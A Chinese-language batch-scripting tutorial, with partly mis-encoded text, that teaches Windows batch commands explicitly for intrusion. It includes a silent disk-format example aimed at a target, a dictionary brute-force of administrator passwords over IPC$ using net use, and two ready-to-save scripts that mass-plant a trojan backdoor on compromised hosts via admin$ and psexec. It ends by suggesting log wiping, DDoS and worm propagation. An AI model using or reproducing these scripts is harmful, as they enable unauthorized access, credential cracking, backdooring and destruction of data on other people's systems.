批處理命令
1、Echo?命令
打開回顯或關(guān)閉請(qǐng)求回顯功能,或顯示消息。如果沒有任何參數(shù),echo?命令將顯示當(dāng)前回顯設(shè)置。
語法
echo?[{on│off}]?[message]
Sample:@echo?off?/?echo?hello?world
在實(shí)際應(yīng)用中我們會(huì)把這條命令和重定向符號(hào)(也稱為管道符號(hào),一般用>?>>?^)結(jié)合來實(shí)現(xiàn)輸入一
些命令到特定格式的文件中.這將在以后的例子中體現(xiàn)出來。?
2.@?命令
表示不顯示@后面的命令,在入侵過程中(例如使用批處理來格式化敵人的硬盤)自然不能讓對(duì)方看到你使用的命
令啦。
Sample:@echo?off
@echo?Now?initializing?the?program,please?wait?a?minite...
@format?X:?/q/u/autoset?(format?這個(gè)命令是不可以使用/y這個(gè)參數(shù)的,可喜的是微軟留了個(gè)autoset這個(gè)
參數(shù)給我們,效果和/y是一樣的。)
3.Goto?命令
指定跳轉(zhuǎn)到標(biāo)簽,找到標(biāo)簽后,程序?qū)⑻幚韽南乱恍虚_始的命令。
語法:goto?label?(label是參數(shù),指定所要轉(zhuǎn)向的批處理程序中的行。)?
Sample:
if?{%1}=={}?goto?noparms
if?{%2}=={}?goto?noparms(如果這里的if、%1、%2你不明白的話,先跳過去,后面會(huì)有詳細(xì)的解釋。)
@Rem?check?parameters?if?null?show?usage
:noparms
echo?Usage:?monitor.bat?ServerIP?PortNumber
goto?end
標(biāo)簽的名字可以隨便起,但是最好是有意義的字母啦,字母前加個(gè):用來表示這個(gè)字母是標(biāo)簽,goto命令就是根
據(jù)這個(gè):來尋找下一步跳到到那里。最好有一些說明這樣你別人看起來才會(huì)理解你的意圖啊。
4.Rem?命令
注釋命令,在C語言中相當(dāng)與/*--------*/,它并不會(huì)被執(zhí)行,只是起一個(gè)注釋的作用,便于別人閱讀和你自己日后
修改。
Rem?Message
Sample:@Rem?Here?is?the?description.
5.Pause?命令
運(yùn)行?Pause?命令時(shí),將顯示下面的消息:?
Press?any?key?to?continue?.?.?.?
Sample:
@echo?off?
:begin?
copy?a:*.*?d:\back
echo?Please?put?a?new?disk?into?driver?A?
pause?
goto?begin?
在這個(gè)例子中,驅(qū)動(dòng)器?A?中磁盤上的所有文件均復(fù)制到d:\back中。顯示的注釋提示您將另一張磁盤放入驅(qū)動(dòng)器?
A?時(shí),pause?命令會(huì)使程序掛起,以便您更換磁盤,然后按任意鍵繼續(xù)處理。
6.Call?命令
從一個(gè)批處理程序調(diào)用另一個(gè)批處理程序,并且不終止父批處理程序。call?命令接受用作調(diào)用目標(biāo)的標(biāo)簽。如果在
腳本或批處理文件外使用?Call,它將不會(huì)在命令行起作用。
語法
call?[[Drive:][Path]?FileName?[BatchParameters]]?[:label?[arguments]]
參數(shù)
[Drive:}[Path]?FileName?
指定要調(diào)用的批處理程序的位置和名稱。filename?參數(shù)必須具有?.bat?或?.cmd?擴(kuò)展名。
7.start?命令
調(diào)用外部程序,所有的DOS命令和命令行程序都可以由start命令來調(diào)用。
入侵常用參數(shù):
MIN?開始時(shí)窗口最小化
SEPARATE?在分開的空間內(nèi)開始?16?位?Windows?程序
HIGH?在?HIGH?優(yōu)先級(jí)類別開始應(yīng)用程序
REALTIME?在?REALTIME?優(yōu)先級(jí)類別開始應(yīng)用程序
WAIT?啟動(dòng)應(yīng)用程序并等候它結(jié)束
parameters?這些為傳送到命令/程序的參數(shù)
執(zhí)行的應(yīng)用程序是?32-位?GUI?應(yīng)用程序時(shí),CMD.EXE?不等應(yīng)用程序終止就返回命令提示。如果在命令腳本內(nèi)執(zhí)
行,該新行為則不會(huì)發(fā)生。
8.choice?命令
choice?使用此命令可以讓用戶輸入一個(gè)字符,從而運(yùn)行不同的命令。使用時(shí)應(yīng)該加/c:參數(shù),c:后應(yīng)寫提示可輸入
的字符,之間無空格。它的返回碼為1234……
如:?choice?/c:dme?defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample:
test.bat的內(nèi)容如下:?
@echo?off?
choice?/c:dme?defrag,mem,end?
if?errorlevel?3?goto?defrag?(應(yīng)先判斷數(shù)值最高的錯(cuò)誤碼)
if?errorlevel?2?goto?mem?
if?errotlevel?1?goto?end?
:defrag?
c:\dos\defrag?
goto?end?
:mem?
mem?
goto?end?
:end?
echo?good?bye
此文件運(yùn)行后,將顯示?defrag,mem,end[D,M,E]??用戶可選擇d?m?e?,然后if語句將作出判斷,d表示執(zhí)行標(biāo)
號(hào)為defrag的程序段,m表示執(zhí)行標(biāo)號(hào)為mem的程序段,e表示執(zhí)行標(biāo)號(hào)為end的程序段,每個(gè)程序段最后都以
goto?end將程序跳到end標(biāo)號(hào)處,然后程序?qū)@示good?bye,文件結(jié)束。
9.If?命令
if?表示將判斷是否符合規(guī)定的條件,從而決定執(zhí)行不同的命令。?有三種格式:?
1、if?"參數(shù)"?==?"字符串"? 待執(zhí)行的命令?
參數(shù)如果等于指定的字符串,則條件成立,運(yùn)行命令,否則運(yùn)行下一句。(注意是兩個(gè)等號(hào))
如if?"%1"=="a"?format?a:?
if?{%1}=={}?goto?noparms
if?{%2}=={}?goto?noparms
2、if?exist?文件名 ?待執(zhí)行的命令?
如果有指定的文件,則條件成立,運(yùn)行命令,否則運(yùn)行下一句。
如if?exist?config.sys?edit?config.sys?
3、if?errorlevel?/?if?not?errorlevel?數(shù)字 ?待執(zhí)行的命令?
如果返回碼等于指定的數(shù)字,則條件成立,運(yùn)行命令,否則運(yùn)行下一句。
如if?errorlevel?2?goto?x2?
DOS程序運(yùn)行時(shí)都會(huì)返回一個(gè)數(shù)字給DOS,稱為錯(cuò)誤碼errorlevel或稱返回碼,常見的返回碼為0、1。
10.for?命令
for?命令是一個(gè)比較復(fù)雜的命令,主要用于參數(shù)在指定的范圍內(nèi)循環(huán)執(zhí)行命令。
在批處理文件中使用?FOR?命令時(shí),指定變量請(qǐng)使用?%%variable
for?{%variable│%%variable}?in?(set)?do?command?[?CommandLineOptions]
%variable?指定一個(gè)單一字母可替換的參數(shù)。
(set)?指定一個(gè)或一組文件。可以使用通配符。
command?指定對(duì)每個(gè)文件執(zhí)行的命令。
command-parameters?為特定命令指定參數(shù)或命令行開關(guān)。
在批處理文件中使用?FOR?命令時(shí),指定變量請(qǐng)使用?%%variable
而不要用?%variable。變量名稱是區(qū)分大小寫的,所以?%i?不同于?%I
如果命令擴(kuò)展名被啟用,下列額外的?FOR?命令格式會(huì)受到
支持:
FOR?/D?%variable?IN?(set)?DO?command?[command-parameters]
如果集中包含通配符,則指定與目錄名匹配,而不與文件
名匹配。
FOR?/R?[[drive:]path]?%variable?IN?(set)?DO?command?[command-
檢查以?[drive:]path?為根的目錄樹,指向每個(gè)目錄中的
FOR?語句。如果在?/R?后沒有指定目錄,則使用當(dāng)前
目錄。如果集僅為一個(gè)單點(diǎn)(.)字符,則枚舉該目錄樹。
FOR?/L?%variable?IN?(start,step,end)?DO?command?[command-para
該集表示以增量形式從開始到結(jié)束的一個(gè)數(shù)字序列。
因此,(1,1,5)?將產(chǎn)生序列?1?2?3?4?5,(5,-1,1)?將產(chǎn)生
序列?(5?4?3?2?1)。
FOR?/F?["options"]?%variable?IN?(file-set)?DO?command?
FOR?/F?["options"]?%variable?IN?("string")?DO?command?
FOR?/F?["options"]?%variable?IN?('command')?DO?command?
或者,如果有?usebackq?選項(xiàng):
FOR?/F?["options"]?%variable?IN?(file-set)?DO?command?
FOR?/F?["options"]?%variable?IN?("string")?DO?command?
FOR?/F?["options"]?%variable?IN?('command')?DO?command?
filenameset?為一個(gè)或多個(gè)文件名。繼續(xù)到?filenameset?中的
下一個(gè)文件之前,每份文件都已被打開、讀取并經(jīng)過處理。
處理包括讀取文件,將其分成一行行的文字,然后將每行
解析成零或更多的符號(hào)。然后用已找到的符號(hào)字符串變量值
調(diào)用?For?循環(huán)。以默認(rèn)方式,/F?通過每個(gè)文件的每一行中分開
的第一個(gè)空白符號(hào)。跳過空白行。您可通過指定可選?"options"
參數(shù)替代默認(rèn)解析操作。這個(gè)帶引號(hào)的字符串包括一個(gè)或多個(gè)
指定不同解析選項(xiàng)的關(guān)鍵字。這些關(guān)鍵字為:
eol=c?-?指一個(gè)行注釋字符的結(jié)尾(就一個(gè))
skip=n?-?指在文件開始時(shí)忽略的行數(shù)。
delims=xxx?-?指分隔符集。這個(gè)替換了空格和跳格鍵的
默認(rèn)分隔符集。
tokens=x,y,m-n?-?指每行的哪一個(gè)符號(hào)被傳遞到每個(gè)迭代
的?for?本身。這會(huì)導(dǎo)致額外變量名稱的
格式為一個(gè)范圍。通過?nth?符號(hào)指定?m
符號(hào)字符串中的最后一個(gè)字符星號(hào),
那么額外的變量將在最后一個(gè)符號(hào)解析之
分配并接受行的保留文本。
usebackq?-?指定新語法已在下類情況中使用:
在作為命令執(zhí)行一個(gè)后引號(hào)的字符串并且
引號(hào)字符為文字字符串命令并允許在?fi
中使用雙引號(hào)擴(kuò)起文件名稱。
sample1:
FOR?/F?"eol=;?tokens=2,3*?delims=,?"?%i?in?(myfile.txt)?do?command
會(huì)分析?myfile.txt?中的每一行,忽略以分號(hào)打頭的那些行,將
每行中的第二個(gè)和第三個(gè)符號(hào)傳遞給?for?程序體;用逗號(hào)和/或
空格定界符號(hào)。請(qǐng)注意,這個(gè)?for?程序體的語句引用?%i?來
取得第二個(gè)符號(hào),引用?%j?來取得第三個(gè)符號(hào),引用?%k
來取得第三個(gè)符號(hào)后的所有剩余符號(hào)。對(duì)于帶有空格的文件
名,您需要用雙引號(hào)將文件名括起來。為了用這種方式來使
用雙引號(hào),您還需要使用?usebackq?選項(xiàng),否則,雙引號(hào)會(huì)
被理解成是用作定義某個(gè)要分析的字符串的。
%i?專門在?for?語句中得到說明,%j?和?%k?是通過
tokens=?選項(xiàng)專門得到說明的。您可以通過?tokens=?一行
指定最多?26?個(gè)符號(hào),只要不試圖說明一個(gè)高于字母?'z'?或
'Z'?的變量。請(qǐng)記住,F(xiàn)OR?變量是單一字母、分大小寫和全局的;
同時(shí)不能有?52?個(gè)以上都在使用中。
您還可以在相鄰字符串上使用?FOR?/F?分析邏輯;方法是,
用單引號(hào)將括號(hào)之間的?filenameset?括起來。這樣,該字符
串會(huì)被當(dāng)作一個(gè)文件中的一個(gè)單一輸入行。
最后,您可以用?FOR?/F?命令來分析命令的輸出。方法是,將
括號(hào)之間的?filenameset?變成一個(gè)反括字符串。該字符串會(huì)
被當(dāng)作命令行,傳遞到一個(gè)子?CMD.EXE,其輸出會(huì)被抓進(jìn)
內(nèi)存,并被當(dāng)作文件分析。因此,以下例子:
FOR?/F?"usebackq?delims=="?%i?IN?(`set`)?DO?@echo?%i
會(huì)枚舉當(dāng)前環(huán)境中的環(huán)境變量名稱。
另外,F(xiàn)OR?變量參照的替換已被增強(qiáng)。您現(xiàn)在可以使用下列
選項(xiàng)語法:
~I?-?刪除任何引號(hào)("),擴(kuò)充?%I
%~fI?-?將?%I?擴(kuò)充到一個(gè)完全合格的路徑名
%~dI?-?僅將?%I?擴(kuò)充到一個(gè)驅(qū)動(dòng)器號(hào)
%~pI?-?僅將?%I?擴(kuò)充到一個(gè)路徑
%~nI?-?僅將?%I?擴(kuò)充到一個(gè)文件名
%~xI?-?僅將?%I?擴(kuò)充到一個(gè)文件擴(kuò)展名
%~sI?-?擴(kuò)充的路徑只含有短名
%~aI?-?將?%I?擴(kuò)充到文件的文件屬性
%~tI?-?將?%I?擴(kuò)充到文件的日期/時(shí)間
%~zI?-?將?%I?擴(kuò)充到文件的大小
%~$PATH:I?-?查找列在路徑環(huán)境變量的目錄,并將?%I?擴(kuò)充
到找到的第一個(gè)完全合格的名稱。如果環(huán)境變量
未被定義,或者沒有找到文件,此組合鍵會(huì)擴(kuò)充
空字符串
可以組合修飾符來得到多重結(jié)果:
%~dpI?-?僅將?%I?擴(kuò)充到一個(gè)驅(qū)動(dòng)器號(hào)和路徑
%~nxI?-?僅將?%I?擴(kuò)充到一個(gè)文件名和擴(kuò)展名
%~fsI?-?僅將?%I?擴(kuò)充到一個(gè)帶有短名的完整路徑名
%~dp$PATH:i?-?查找列在路徑環(huán)境變量的目錄,并將?%I?擴(kuò)充
到找到的第一個(gè)驅(qū)動(dòng)器號(hào)和路徑。
%~ftzaI?-?將?%I?擴(kuò)充到類似輸出線路的?DIR
在以上例子中,%I?和?PATH?可用其他有效數(shù)值代替。%~?語法
用一個(gè)有效的?FOR?變量名終止。選取類似?%I?的大寫變量名
比較易讀,而且避免與不分大小寫的組合鍵混淆。
以上是MS的官方幫助,下面我們舉幾個(gè)例子來具體說明一下For命令在入侵中的用途。
sample2:
利用For命令來實(shí)現(xiàn)對(duì)一臺(tái)目標(biāo)Win2k主機(jī)的暴力密碼破解。
我們用net?use?\\ip\ipc$?"password"?/u:"administrator"來嘗試這和目標(biāo)主機(jī)進(jìn)行連接,當(dāng)成功時(shí)記下密
碼。
最主要的命令是一條:for?/f?i%?in?(dict.txt)?do?net?use?\\ip\ipc$?"i%"?/u:"administrator"
用i%來表示admin的密碼,在dict.txt中這個(gè)取i%的值用net?use?命令來連接。然后將程序運(yùn)行結(jié)果傳遞給find
命令--
for?/f?i%%?in?(dict.txt)?do?net?use?\\ip\ipc$?"i%%"?/u:"administrator"│find?":命令成功完成">&g
t;D:\ok.txt?,這樣就ko了。
sample3:
你有沒有過手里有大量肉雞等著你去種后門+木馬呢?,當(dāng)數(shù)量特別多的時(shí)候,原本很開心的一件事都會(huì)變得很郁
悶:)。文章開頭就談到使用批處理文件,可以簡(jiǎn)化日常或重復(fù)性任務(wù)。那么如何實(shí)現(xiàn)呢?呵呵,看下去你就會(huì)明
白了。
主要命令也只有一條:(在批處理文件中使用?FOR?命令時(shí),指定變量使用?%%variable)
@for?/f?"tokens=1,2,3?delims=?"?%%i?in?(victim.txt)?do?start?call?cultivate.bat?%%i?%%j?%%k
tokens的用法請(qǐng)參見上面的sample1,在這里它表示按順序?qū)ictim.txt中的內(nèi)容傳遞給cultivate.bat中的參
數(shù)%i?%j?%k。
而cultivate.bat無非就是用net?use命令來建立IPC$連接,并copy木馬+后門到victim并用返回碼(If?errorle
ver?=)來篩選成功種植后門的主機(jī)并echo出來,或者echo到文件。
delims=?表示vivtim.txt中的內(nèi)容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內(nèi)容是什么樣
的了。應(yīng)該根據(jù)%%i?%%j?%%k表示的對(duì)象來,一般就是?ip?password?username。
---------------?cut?here?then?save?as?a?batchfile(I?call?it?main.bat?)?---------------------------
@echo?off
@if?"%1"==""?goto?usage
@for?/f?"tokens=1,2,3?delims=?"?%%i?in?(victim.txt)?do?start?call?IPChack.bat?%%i?%%j?%%k
@goto?end
:usage
@echo?run?this?batch?in?dos?modle.or?just?double-click?it.
:end
---------------?cut?here?then?save?as?a?batchfile(I?call?it?main.bat?)?---------------------------
-------------------?cut?here?then?save?as?a?batchfile(I?call?it?door.bat)?-----------------------------
@net?use?\\%1\ipc$?%3?/u:"%2"
@if?errorlevel?1?goto?failed
@echo?Trying?to?establish?the?IPC$?connection?…………OK
@copy?windrv32.exe\\%1\admin$\system32?&&?if?not?errorlevel?1?echo?IP?%1?USER?%2?PWD?
%3?>>ko.txt
@p***ec?\\%1?c:\winnt\system32\windrv32.exe
@p***ec?\\%1?net?start?windrv32?&&?if?not?errorlevel?1?echo?%1?Backdoored?>>ko.txt
:failed
@echo?Sorry?can?not?connected?to?the?victim.
-----------------?cut?here?then?save?as?a?batchfile(I?call?it?door.bat)?--------------------------------
這只是一個(gè)自動(dòng)種植后門批處理的雛形,兩個(gè)批處理和后門程序(Windrv32.exe),PSexec.exe需放在統(tǒng)一目
錄下.批處理內(nèi)容
尚可擴(kuò)展,例如:加入清除日志+DDOS的功能,加入定時(shí)添加用戶的功能,更深入一點(diǎn)可以使之具備自動(dòng)傳播功能(蠕
蟲).此處不多做敘述,有興趣的朋友可自行研究.
|